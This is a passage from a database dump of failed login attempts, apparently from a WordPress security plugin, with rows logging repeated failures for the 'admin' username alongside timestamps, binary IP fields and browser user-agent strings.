Firefox/62.0'),(2499,4550,1628455393.353383,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2500,4555,1628457397.235915,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m{G�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2501,4557,1628458204.127269,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2502,4563,1628460903.593206,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2503,4566,1628462124.509643,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2504,4568,1628462884.541546,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����Q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2505,4575,1628464874.003003,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2506,4576,1628465275.288756,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2507,4579,1628466484.468180,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2508,4579,1628466484.506051,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2509,4581,1628467304.352433,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2510,4587,1628469773.152251,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6O��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2511,4587,1628469773.193255,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6O��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2512,4592,1628471843.591089,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��νUX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2513,4595,1628473085.149866,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2514,4600,1628475563.387427,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q`q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2515,4604,1628478080.066421,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^�|�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2516,4609,1628480446.865342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2517,4612,1628481613.240417,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[�ɤ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2518,4613,1628481995.542285,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^��W','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2519,4615,1628482766.582208,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��pNH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2520,4616,1628483148.550597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2521,4619,1628484314.255612,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2522,4623,1628486634.545938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2523,4623,1628486634.614273,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2524,4624,1628487028.815391,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\r�ל','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2525,4626,1628487825.305615,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2526,4627,1628488243.883067,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2527,4630,1628489383.919372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j5s}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2528,4630,1628489383.968088,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j5s}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2529,4631,1628489770.297615,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���.yB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2530,4633,1628490556.539334,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2531,4633,1628490556.552232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2532,4635,1628491339.845950,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2533,4635,1628491339.901504,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2534,4637,1628492124.307842,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2535,4640,1628493275.963012,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���:\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2536,4641,1628493667.220214,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2537,4647,1628497427.422420,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2538,4650,1628498575.883408,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2539,4656,1628501745.419178,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2540,4658,1628502495.602166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2541,4658,1628502495.632478,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2542,4659,1628502528.803991,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���	Np','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2543,4661,1628503315.665974,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2544,4662,1628503400.811389,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(2545,4664,1628503716.327234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˟P�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(2546,4665,1628503716.853707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˟P�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(2547,4666,1628503717.368421,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˟P�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(2548,4667,1628504077.135704,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2549,4669,1628504516.965100,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2550,4670,1628504875.797083,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"DaF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2551,4671,1628505280.157179,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ge��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2552,4672,1628505314.908872,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(2553,4673,1628505396.569889,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gR\Z','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(2554,4674,1628505680.409219,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2555,4680,1628507200.545685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(2556,4681,1628507276.774232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(2557,4682,1628507317.882026,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2558,4683,1628507688.483828,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2559,4684,1628508111.407480,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(2560,4685,1628508115.577854,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2561,4689,1628508900.115347,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2562,4690,1628508970.327581,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���=�','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2563,4691,1628509037.441918,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xc��','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(2564,4692,1628509299.070623,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2565,4694,1628509809.081709,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2566,4695,1628509877.659158,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\'l\0�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2567,4696,1628510499.680169,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-7�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2568,4698,1628511303.277510,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2569,4699,1628511501.802669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y�g','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(2570,4700,1628511572.038123,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���7o\r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(2571,4701,1628511708.074263,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2572,4702,1628512119.561032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2573,4703,1628512500.433137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(2574,4704,1628512515.233384,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2575,4705,1628512926.420478,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2576,4706,1628513147.277500,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���!','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2577,4707,1628513329.618763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2578,4708,1628513737.977378,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���갞','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2579,4709,1628513794.800939,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(2580,4711,1628514450.097759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�\'','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(2581,4715,1628515387.283198,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ml��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2582,4716,1628515771.975091,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2583,4717,1628515877.763686,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dd@','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(2584,4718,1628516179.577337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2585,4719,1628516589.084967,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2586,4722,1628517401.356971,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2587,4723,1628517407.641560,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��;n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2588,4724,1628517831.725248,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2589,4725,1628518358.647755,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��z���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2590,4726,1628518879.662097,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��tK�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(2591,4727,1628519063.736084,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2592,4735,1628524767.938535,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(2593,4736,1628525489.698502,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(2594,4737,1628526180.585302,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(2595,4738,1628526850.673357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(2596,4739,1628527519.299090,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(2597,4740,1628528199.644379,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����B','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(2598,4743,1628530249.871249,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6*','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2599,4744,1628530909.859495,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(2600,4746,1628533060.006103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(2601,4748,1628536016.177870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(2602,4749,1628537471.702221,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(2603,4750,1628538200.997256,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̆�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(2604,4751,1628538932.539234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�S','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(2605,4752,1628539656.979693,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(2606,4753,1628540364.680514,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���D�	','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(2607,4755,1628542440.412395,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(2608,4758,1628544526.356814,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�fH','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2609,4759,1628545502.314755,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϴ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2610,4761,1628547453.609997,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����F','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(2611,4762,1628549407.098125,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H��s','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(2612,4764,1628551371.953595,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Kj','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(2613,4765,1628553324.057765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϴ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2614,4767,1628557263.549823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�\r�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(2615,4769,1628559236.949212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(2616,4769,1628559237.008468,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(2617,4770,1628560223.419366,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2618,4771,1628561217.436598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(2619,4772,1628562265.362589,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���옔','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(2620,4774,1628564220.589110,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�%','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(2621,4776,1628566237.706129,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����@','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 